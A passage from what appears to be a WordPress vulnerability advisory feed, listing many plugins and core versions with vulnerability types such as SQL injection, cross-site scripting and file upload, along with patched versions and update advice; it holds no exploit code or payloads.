Recommended Action: Update to version 2.0.6, or a newer patched version

Plugin: WS Form LITE – Drag & Drop Contact Form Builder for WordPress

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 1.9.171
Recommended Action: Update to version 1.9.171, or a newer patched version

Plugin: Post SMTP – WordPress SMTP Plugin with Email Logs and Mobile App for Failure Notifications – Gmail SMTP, Office 365, Brevo, Mailgun, Amazon SES and more

Vulnerability: Authenticated (Administrator+) SQL Injection
Patched Version: 2.8.7
Recommended Action: Update to version 2.8.7, or a newer patched version

Plugin: Cookie Params

Vulnerability: Reflected Cross-Site Scripting and Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Welcart e-Commerce

Vulnerability: Authenticated (Editor+) SQL Injection
Patched Version: 2.9.4
Recommended Action: Update to version 2.9.4, or a newer patched version

Plugin: cformsII

Vulnerability: Cross-Site Scripting
Patched Version: 11.6.1
Recommended Action: Update to version 11.6.1, or a newer patched version

Plugin: Echo Sign

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Fast Image Adder

Vulnerability: Arbitrary File Upload
Patched Version: 1.2
Recommended Action: Update to version 1.2, or a newer patched version

Plugin: Animate It!

Vulnerability: Cross-Site Scripting
Patched Version: 2.4.0
Recommended Action: Update to version 2.4.0, or a newer patched version

Plugin: NEX-Forms – Ultimate Form Builder – Contact forms and much more

Vulnerability: Ultimate Form Builder <= 8.4.3
Patched Version: 8.4.4
Recommended Action: Update to version 8.4.4, or a newer patched version

Plugin: AutomateWoo

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.7.6
Recommended Action: Update to version 5.7.6, or a newer patched version

Plugin: teachPress

Vulnerability: Reflected Cross-Site Scripting via meta_field_id and cite_id
Patched Version: 9.0.3
Recommended Action: Update to version 9.0.3, or a newer patched version

Plugin: ApplyOnline – Application Form Builder and Manager

Vulnerability: Missing Authorization
Patched Version: 2.5.4
Recommended Action: Update to version 2.5.4, or a newer patched version

Plugin: Vimeo Video Autoplay Automute

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: GREYD.SUITE

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: Social Sharing Plugin – Social Warfare

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.4.0
Recommended Action: Update to version 4.4.0, or a newer patched version

Core: WordPress

Vulnerability: Arbitrary File Deletion
Patched Version: 3.7.19
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.19, 3.8.19, 3.9.17, 4.0.16, 4.1.16, 4.2.13, 4.3.9, 4.4.8, 4.5.7, 4.6.4, 4.7.3

Plugin: Get Use APIs – JSON Content Importer

Vulnerability: Authenticated (Admin+) Cross-Site Scripting
Patched Version: 1.3.16
Recommended Action: Update to version 1.3.16, or a newer patched version

Plugin: Traffic Analyzer

Vulnerability: Cross-Site Scripting
Patched Version: 3.4.2
Recommended Action: Update to version 3.4.2, or a newer patched version

Plugin: Profile Builder Pro

Vulnerability: Authenticated (Subscriber+) Time-Based One-Time Password Sensitive Information Exposure
Patched Version: 3.10.1
Recommended Action: Update to version 3.10.1, or a newer patched version

Plugin: myCred – Points Management System For Gamification, Ranks, Badges, and Loyalty Rewards Program.

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: WOLF – WordPress Posts Bulk Editor and Manager Professional

Vulnerability: Cross-Site Request Forgery via wpbe_update_page_field
Patched Version: 1.0.7
Recommended Action: Update to version 1.0.7, or a newer patched version

Plugin: WP Sticky Button – Click to Chat

Vulnerability: Missing Authorization to Arbitrary Settings Update
Patched Version: 1.4.1
Recommended Action: Update to version 1.4.1, or a newer patched version

Plugin: supportezzy

Vulnerability: Cross-Site Scripting
Patched Version: 1.2.6
Recommended Action: Update to version 1.2.6, or a newer patched version

Plugin: RokIntroScroller

Vulnerability: Abuse of Functionality
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: Popup Builder – Create highly converting, mobile friendly marketing popups.

Vulnerability: Authenticated Settings Modification, Configuration Disclosure, and User Data Export
Patched Version: 3.64.1
Recommended Action: Update to version 3.64.1, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 5.1.5
Recommended Action: Update to version 5.1.5, or a newer patched version

Plugin: WP-FormAssembly

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.0.8
Recommended Action: Update to version 2.0.8, or a newer patched version

Plugin: Slideoptinprox

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: iframe Shortcode

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Awesome Filterable Portfolio

Vulnerability: Blind SQL Injection
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: Tom M8te

Vulnerability: Directory Traversal
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: JobCareer | Job Board Responsive WordPress Theme

Vulnerability: User Enumeration
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Captcha

Vulnerability: Captcha Bypass
Patched Version: 3.8.2
Recommended Action: Update to version 3.8.2, or a newer patched version

Plugin: Better Messages – Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.9.9.149
Recommended Action: Update to version 1.9.9.149, or a newer patched version

Plugin: JVM Gutenberg Rich Text Icons

Vulnerability: Directory Traversal to Authenticated (Subscriber+) Arbitrary File Deletion
Patched Version: 1.2.7
Recommended Action: Update to version 1.2.7, or a newer patched version

Plugin: Five Star Restaurant Reservations – WordPress Booking Plugin

Vulnerability: Subscriber+ Stored Cross-Site Scripting
Patched Version: 2.4.8
Recommended Action: Update to version 2.4.8, or a newer patched version

Plugin: Store Exporter for WooCommerce – Export Products, Export Orders, Export Subscriptions, and More

Vulnerability: Store Exporter <= 2.3.1
Patched Version: 2.4
Recommended Action: Update to version 2.4, or a newer patched version

Plugin: Cryptocurrency Widgets Pack

Vulnerability: Unauthenticated SQL Injection
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Enhanced Ecommerce Google Analytics for WooCommerce

Vulnerability: Cross-Site Request Forgery
Patched Version: 3.7.2
Recommended Action: Update to version 3.7.2, or a newer patched version

Plugin: AI Engine

Vulnerability: Unauthenticated Arbitrary File Upload via rest_upload
Patched Version: 1.9.99
Recommended Action: Update to version 1.9.99, or a newer patched version

Plugin: Jock On Air Now

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.6.2
Recommended Action: Update to version 5.6.2, or a newer patched version

Plugin: VDZ CallBack Plugin

Vulnerability: Cross-Site Scripting
Patched Version: 1.14.6
Recommended Action: Update to version 1.14.6, or a newer patched version

Plugin: Forminator Forms – Contact Form, Payment Form & Custom Form Builder

Vulnerability: Race Condition to Multiple Poll Voting
Patched Version: 1.24.1
Recommended Action: Update to version 1.24.1, or a newer patched version

Plugin: WordPress Email Marketing Plugin – WP Email Capture

Vulnerability: Missing Authorization to Email Capture List Download
Patched Version: 3.11
Recommended Action: Update to version 3.11, or a newer patched version

Plugin: My Calendar – Accessible Event Manager

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 2.5.17
Recommended Action: Update to version 2.5.17, or a newer patched version

Plugin: WP-reCAPTCHA

Vulnerability: Multiple Cross-Site Request Forgery
Patched Version: 3.0
Recommended Action: Update to version 3.0, or a newer patched version

Plugin: Publish to Schedule

Vulnerability: Cross-Site Request Forgery leading to Plugin Option Changes
Patched Version: 4.5.4
Recommended Action: Update to version 4.5.4, or a newer patched version

Plugin: Support Board

Vulnerability: Agent+ Stored Cross-Site Scripting
Patched Version: 3.3.5
Recommended Action: Update to version 3.3.5, or a newer patched version

Plugin: Events Manager – Calendar, Bookings, Tickets, and more!

Vulnerability: Cross-Site Scripting
Patched Version: 5.5.7
Recommended Action: Update to version 5.5.7, or a newer patched version

Plugin: Mega Addons For WPBakery Page Builder

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 4.3.0
Recommended Action: Update to version 4.3.0, or a newer patched version

Plugin: MainWP Google Analytics Extension

Vulnerability: Missing Authorization to Plugin Settings Change
Patched Version: 4.0.5
Recommended Action: Update to version 4.0.5, or a newer patched version

Plugin: Mega Main Menu

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Ketchup Restaurant Reservations

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: EmbedStories – Display social media stories

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 0.7.5
Recommended Action: Update to version 0.7.5, or a newer patched version

Plugin: amr ical events lists

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Paymattic – Secure, Simple Payment & Donation with Subscription Payments, Recurring Donations, Customer Management

Vulnerability: Unauthenticated Stored Cross-Site Scripting
Patched Version: 4.2.1
Recommended Action: Update to version 4.2.1, or a newer patched version

Plugin: Gutenberg Blocks with AI by Kadence WP – Page Builder Features

Vulnerability: Unauthenticated Arbitrary File Upload
Patched Version: 3.1.11
Recommended Action: Update to version 3.1.11, or a newer patched version

Plugin: Pagination by BestWebSoft – Customizable WordPress Content Splitter and Navigation Plugin

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 1.2.3
Recommended Action: Update to version 1.2.3, or a newer patched version

Plugin: WooCommerce Subscription

Vulnerability: Missing Authorization to Insecure Direct Object Reference
Patched Version: 5.1.3
Recommended Action: Update to version 5.1.3, or a newer patched version

Plugin: Analytify – Google Analytics Dashboard For WordPress (GA4 analytics made easy)

Vulnerability: Missing Authorization & Cross-Site Request Forgery
Patched Version: 4.3.0
Recommended Action: Update to version 4.3.0, or a newer patched version

Plugin: RSS Aggregator – RSS Import, News Feeds, Feed to Post, and Autoblogging

Vulnerability: Authorization Bypass
Patched Version: 4.6.4
Recommended Action: Update to version 4.6.4, or a newer patched version

Plugin: woocommerce-checkout-field-editor

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.7.5
Recommended Action: Update to version 1.7.5, or a newer patched version

Plugin: Lazy Load for Videos

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.18.3
Recommended Action: Update to version 2.18.3, or a newer patched version

Plugin: Supra CSV

Vulnerability: Stored Cross-Site Scripting via Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Tapfiliate

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 3.0.13
Recommended Action: Update to version 3.0.13, or a newer patched version

Plugin: ProfileGrid – User Profiles, Groups and Communities

Vulnerability: Missing Authorization to Arbitrary Group Option Modification and Privilege Escalation
Patched Version: 5.5.3
Recommended Action: Update to version 5.5.3, or a newer patched version

Plugin: WordPress Multisite Content Copier/Updater

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.5.0
Recommended Action: Update to version 1.5.0, or a newer patched version

Plugin: Widget Logic

Vulnerability: Cross-Site Request Forgery
Patched Version: 5.10.2
Recommended Action: Update to version 5.10.2, or a newer patched version

Plugin: Booking for Appointments and Events Calendar – Amelia

Vulnerability: Information Disclosure and SMS Spam
Patched Version: 1.0.48
Recommended Action: Update to version 1.0.48, or a newer patched version

Plugin: WP Report Post

Vulnerability: No subtitle
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Image Optimizer, Resizer and CDN – Sirv

Vulnerability: Missing Authorization via sirv_disconnect
Patched Version: 7.1.3
Recommended Action: Update to version 7.1.3, or a newer patched version

Plugin: Import Export Suite for CSV and XML Datafeed

Vulnerability: Cross-Site Scripting
Patched Version: 3.8.1
Recommended Action: Update to version 3.8.1, or a newer patched version

Plugin: Redirect 404 Error Page to Homepage or Custom Page with Logs

Vulnerability: Log Deletion via Cross-Site Request Forgery
Patched Version: 1.7.9
Recommended Action: Update to version 1.7.9, or a newer patched version

Plugin: Donorbox – Free Recurring Donation Plugin and Fundraising Platform

Vulnerability: Cross-Site Scripting
Patched Version: 7.1.7
Recommended Action: Update to version 7.1.7, or a newer patched version

Plugin: Travel Management

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Album and Image Gallery with Lightbox – Flagallery Photo Portfolio

Vulnerability: SQL Injection
Patched Version: 2.10
Recommended Action: Update to version 2.10, or a newer patched version

Plugin: Better Click To Tweet

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.10.2
Recommended Action: Update to version 5.10.2, or a newer patched version

Plugin: Integrate Google Drive

Vulnerability: Missing Authorization via save_settings
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: Better Messages – Live Chat for WordPress, BuddyPress, PeepSo, Ultimate Member, BuddyBoss

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting via Shortcode
Patched Version: 2.4.1
Recommended Action: Update to version 2.4.1, or a newer patched version

Plugin: Booster for WooCommerce

Vulnerability: Authenticated (Subscriber+) Information Disclosure via Shortcode
Patched Version: 7.1.1
Recommended Action: Update to version 7.1.1, or a newer patched version

Plugin: Campaign Monitor for WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.8.14
Recommended Action: Update to version 2.8.14, or a newer patched version

Plugin: Page Builder with Image Map by AZEXO

Vulnerability: Cross-Site Request Forgery to Post Creation/Modification/Deletion
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Webcam Microphone Screen Recorder HTML5

Vulnerability: Cross-Site Scripting
Patched Version: 3.2.4
Recommended Action: Update to version 3.2.4, or a newer patched version

Plugin: SEO Plugin by Squirrly SEO

Vulnerability: Authenticated (Contributor+) Arbitrary File Upload
Patched Version: 12.1.11
Recommended Action: Update to version 12.1.11, or a newer patched version

Plugin: Steam Group Viewer

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: How to Create an App for Android iPhone Easytouch

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: CodeBard's Patron Button and Widgets for Patreon

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.2.0
Recommended Action: Update to version 2.2.0, or a newer patched version

Plugin: PHP Execution

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Restaurant Reservations

Vulnerability: Authenticated (Contributor+) Stored Cross-Site Scripting
Patched Version: 1.9
Recommended Action: Update to version 1.9, or a newer patched version

Plugin: Easy Social Feed – Social Photos Gallery – Post Feed – Like Box

Vulnerability: Missing Authorization via hide_free_sidebar()
Patched Version: 6.5.2
Recommended Action: Update to version 6.5.2, or a newer patched version

Plugin: Ninja Forms – The Contact Form Builder That Grows With You

Vulnerability: HTML Injection
Patched Version: 3.0.31
Recommended Action: Update to version 3.0.31, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Request Forgery to Cross-Site Scripting via Comments
Patched Version: 3.7.29
Recommended Action: Update to one of the following versions, or a newer patched version: 3.7.29, 3.8.29, 3.9.27, 4.0.26, 4.1.26, 4.2.23, 4.3.19, 4.4.18, 4.5.17, 4.6.14, 4.7.13, 4.8.9, 4.9.10, 5.0.4, 5.1.1

Plugin: WP Mail Log

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.0.2
Recommended Action: Update to version 1.0.2, or a newer patched version

Plugin: Participants Database

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting via plugin settings
Patched Version: 2.5
Recommended Action: Update to version 2.5, or a newer patched version

Plugin: Kindeditor For WordPress

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4
Recommended Action: Update to version 1.4, or a newer patched version

Plugin: Image Slider by Ays- Responsive Slider and Carousel

Vulnerability: SQL Injection
Patched Version: 2.5.0
Recommended Action: Update to version 2.5.0, or a newer patched version

Plugin: RapidLoad – Optimize Web Vitals Automatically

Vulnerability: Missing Authorization in ‘clear_uucss_logs’
Patched Version: 1.7.2
Recommended Action: Update to version 1.7.2, or a newer patched version

Plugin: Video Conferencing with Zoom

Vulnerability: E-mail Address Disclosure
Patched Version: 3.8.17
Recommended Action: Update to version 3.8.17, or a newer patched version

Plugin: Design Approval System

Vulnerability: Cross-Site Scripting
Patched Version: 3.7
Recommended Action: Update to version 3.7, or a newer patched version

Plugin: WordPress Classifieds Plugin – Ad Directory & Listings by AWP Classifieds

Vulnerability: Cross-Site Scripting
Patched Version: 3.3.2
Recommended Action: Update to version 3.3.2, or a newer patched version

Plugin: Post Grid and Gutenberg Blocks – ComboBlocks

Vulnerability: Missing Authorization to Sensitive Information Exposure via REST API
Patched Version: 2.2.51
Recommended Action: Update to version 2.2.51, or a newer patched version

Plugin: Export Users Data CSV

Vulnerability: Authenticated (Subscriber+) CSV Injection
Patched Version: 2.2
Recommended Action: Update to version 2.2, or a newer patched version

Core: WordPress

Vulnerability: 6.3.1
Patched Version: 5.6.12
Recommended Action: Update to one of the following versions, or a newer patched version: 5.6.12, 5.7.10, 5.8.8, 5.9.8, 6.0.6, 6.1.4, 6.2.3, 6.3.2

Plugin: Search and Share

Vulnerability: Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: MonsterInsights – Google Analytics Dashboard for WordPress (Website Stats Made Easy)

Vulnerability: Stored Cross-Site Scripting
Patched Version: 5.3.3
Recommended Action: Update to version 5.3.3, or a newer patched version

Plugin: Contact Form Advanced Database

Vulnerability: Missing Authorization
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Community Events

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.4.8
Recommended Action: Update to version 1.4.8, or a newer patched version

Plugin: Customer Support Software, Live Chat, & Marketing Automation

Vulnerability: Authenticated (Administrator+) Cross-Site Scripting via ‘FormillaToolsID’
Patched Version: 1.1
Recommended Action: Update to version 1.1, or a newer patched version

Plugin: Custom Contact Forms

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 5.1.0.3
Recommended Action: Update to version 5.1.0.3, or a newer patched version

Plugin: WooCommerce Bookings

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0.4
Recommended Action: Update to version 2.0.4, or a newer patched version

Plugin: Subscribers Text Counter

Vulnerability: Cross-Site Request Forgery to Settings Update and Cross-Site Scripting
Patched Version: 1.7.1
Recommended Action: Update to version 1.7.1, or a newer patched version

Plugin: Shortcoder — Create Shortcodes for Anything

Vulnerability: Missing Authorization
Patched Version: 6.3.1
Recommended Action: Update to version 6.3.1, or a newer patched version

Plugin: Xllentech English Islamic Calendar

Vulnerability: SQL Injection
Patched Version: 2.6.8
Recommended Action: Update to version 2.6.8, or a newer patched version

Plugin: WPsoonOnlinePage

Vulnerability: Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: OnionBuzz

Vulnerability: OnionBuzz < 1.2.2
Patched Version: 1.2.2
Recommended Action: Update to version 1.2.2, or a newer patched version

Plugin: Responsive Menu – Create Mobile-Friendly Menu

Vulnerability: Missing Authorization Checks
Patched Version: 4.1.8
Recommended Action: Update to version 4.1.8, or a newer patched version

Core: WordPress

Vulnerability: Sensitive Information Disclosure
Patched Version: 4.7.20
Recommended Action: Update to one of the following versions, or a newer patched version: 4.7.20, 4.8.16, 4.9.17, 5.0.12, 5.1.9, 5.2.10, 5.3.7, 5.4.5, 5.5.4, 5.6.3, 5.7.1

Plugin: MailPoet Newsletters (Previous)

Vulnerability: Arbitrary File Upload
Patched Version: 2.6.7
Recommended Action: Update to version 2.6.7, or a newer patched version

Plugin: Name Directory

Vulnerability: Unauthorized Settings Update
Patched Version: 1.25.5
Recommended Action: Update to version 1.25.5, or a newer patched version

Plugin: Contact Form by BestWebSoft – Advanced Contact Us Form Builder for WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 3.35
Recommended Action: Update to version 3.35, or a newer patched version

Plugin: All-In-One Security (AIOS) – Security and Firewall

Vulnerability: Open Redirect and Reflected Cross-Site Scripting
Patched Version: 4.4.11
Recommended Action: Update to version 4.4.11, or a newer patched version

Plugin: Ad Inserter – Ad Manager & AdSense Ads

Vulnerability: Authenticated (Admin+) Remote Code Execution
Patched Version: 2.7.11
Recommended Action: Update to version 2.7.11, or a newer patched version

Plugin: HTML2WP

Vulnerability: Arbitrary File Upload
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: WP Google Review Slider

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 11.6
Recommended Action: Update to version 11.6, or a newer patched version

Plugin: Download Manager

Vulnerability: Cross-Site Scripting
Patched Version: 3.2.22
Recommended Action: Update to version 3.2.22, or a newer patched version

Plugin: MainWP Child – Securely Connects to the MainWP Dashboard to Manage Multiple Sites

Vulnerability: Multiple Cross-Site Scripting
Patched Version: 2.0.28
Recommended Action: Update to version 2.0.28, or a newer patched version

Plugin: Custom Twitter Feeds – A Tweets Widget or X Feed Widget

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.0
Recommended Action: Update to version 2.0, or a newer patched version

Plugin: Share This Image

Vulnerability: Cross-Site Scripting
Patched Version: 1.04
Recommended Action: Update to version 1.04, or a newer patched version

Plugin: Backup, Restore and Migrate your sites with XCloner

Vulnerability: Cross-Site Request Forgery
Patched Version: 4.2.153
Recommended Action: Update to version 4.2.153, or a newer patched version

Plugin: WP Maps – Display Google Maps Perfectly with Ease

Vulnerability: Cross-Site Request Forgery to PHP Object Injection
Patched Version: 4.1.0
Recommended Action: Update to version 4.1.0, or a newer patched version

Plugin: WP-FaceThumb

Vulnerability: Cross-Site Scripting
Patched Version: 0.2
Recommended Action: Update to version 0.2, or a newer patched version

Plugin: WP Custom Admin Interface

Vulnerability: Cross-Site Request Forgery to Transients Deletion
Patched Version: 7.33
Recommended Action: Update to version 7.33, or a newer patched version

Plugin: WordPress Bitcoin Payments – Blockonomics

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 3.3
Recommended Action: Update to version 3.3, or a newer patched version

Plugin: Contact Form builder with drag & drop for WordPress – Kali Forms

Vulnerability: Cross-Site Request Forgery
Patched Version: 2.1.2
Recommended Action: Update to version 2.1.2, or a newer patched version

Plugin: 有赏 You Shang

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Core: WordPress MU

Vulnerability: SQL Injection
Patched Version: 1.2.5
Recommended Action: Update to version 1.2.5, or a newer patched version

Plugin: ApplyOnline – Application Form Builder and Manager

Vulnerability: Authenticated (Administrator+) Stored Cross-Site Scripting
Patched Version: 2.5.1
Recommended Action: Update to version 2.5.1, or a newer patched version

Plugin: Stop Referrer Spam

Vulnerability: Cross-Site Request Forgery via processParameters
Patched Version: 1.3.1
Recommended Action: Update to version 1.3.1, or a newer patched version

Plugin: 3D Cover Carousel

Vulnerability: Reflected Cross-Site Scripting
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Broadcast Live Video – Live Streaming : HTML5, WebRTC, HLS, RTSP, RTMP

Vulnerability: Arbitrary File Read/Deletion
Patched Version: 4.29.5
Recommended Action: Update to version 4.29.5, or a newer patched version

Plugin: GNUCommerce

Vulnerability: Cross-Site Scripting
Patched Version: 0.5.7-beta
Recommended Action: Update to version 0.5.7-beta, or a newer patched version

Core: WordPress

Vulnerability: Restriction Bypass
Patched Version: 2.2.3
Recommended Action: Update to version 2.2.3, or a newer patched version

Plugin: Answer My Question

Vulnerability: SQL Injection
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Short URL

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.6.5
Recommended Action: Update to version 1.6.5, or a newer patched version

Plugin: WP Adminify – Custom WordPress Dashboard, Login and Admin Customizer

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 3.1.8
Recommended Action: Update to version 3.1.8, or a newer patched version

Plugin: MStore API – Create Native Android & iOS Apps On The Cloud

Vulnerability: Cross-Site Request Forgery to Order Title Update
Patched Version: 3.9.7
Recommended Action: Update to version 3.9.7, or a newer patched version

Plugin: Tutor LMS – eLearning and online course solution

Vulnerability: SQL Injection
Patched Version: 1.7.7
Recommended Action: Update to version 1.7.7, or a newer patched version

Core: WordPress

Vulnerability: Cross-Site Scripting
Patched Version: 2.0.10
Recommended Action: Update to one of the following versions, or a newer patched version: 2.0.10, 2.1.2

Plugin: WP Affiliate Platform

Vulnerability: Cross-Site Request Forgery
Patched Version: 6.4.0
Recommended Action: Update to version 6.4.0, or a newer patched version

Plugin: Integration for HubSpot and Contact Form 7, WPForms, Elementor, Ninja Forms

Vulnerability: Open Redirect via state parameter
Patched Version: 1.2.9
Recommended Action: Update to version 1.2.9, or a newer patched version

Plugin: Knews Multilingual Newsletters

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 1.1.1
Recommended Action: Update to version 1.1.1, or a newer patched version

Plugin: Add Link to Facebook

Vulnerability: Authenticated Stored Cross-Site Scripting
Patched Version: 1.216
Recommended Action: Update to version 1.216, or a newer patched version

Plugin: WP Super Cache

Vulnerability: Remote Code Execution
Patched Version: 1.3.2
Recommended Action: Update to version 1.3.2, or a newer patched version

Plugin: Event Easy Calendar

Vulnerability: Multiple Cross-Site Request Forgery
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: LeagueManager

Vulnerability: SQL Injection
Patched Version: 4.0.5
Recommended Action: Update to version 4.0.5, or a newer patched version

Plugin: WP Categories Widget

Vulnerability: Reflected Cross-Site Scripting
Patched Version: 2.3
Recommended Action: Update to version 2.3, or a newer patched version

Plugin: Music Player for WooCommerce

Vulnerability: Authenticated (Admin+) Stored Cross-Site Scripting
Patched Version: 1.0.173
Recommended Action: Update to version 1.0.173, or a newer patched version

Plugin: Sucuri Security – Auditing, Malware Scanner and Security Hardening

Vulnerability: Cross-Site Request Forgery
Patched Version: 1.8.34
Recommended Action: Update to version 1.8.34, or a newer patched version

Plugin: WPeMatico RSS Feed Fetcher

Vulnerability: Admin+ Stored Cross-Site Scripting
Patched Version: 2.6.12
Recommended Action: Update to version 2.6.12, or a newer patched version

Plugin: WordPress RokBox

Vulnerability: Sensitive Data Disclosure
Patched Version: No patched version available
Recommended Action: No known patch available. Please review the vulnerability’s details in depth and employ mitigations based on your organization’s risk tolerance. It may be best to uninstall the affected software and find a replacement.

Plugin: Grid Plus – Unlimited grid layout

Vulnerability: Authenticated (Subscriber+) Local File Inclusion via Shortcode
Patched Version: 1.3.4
Recommended Action: Update to version 1.3.4, or a newer patched version

Plugin: MetForm – Contact Form, Survey, Quiz, & Custom Form Builder for Elementor

Vulnerability: Missing Authorization via submit
Patched Version: 3.4.1
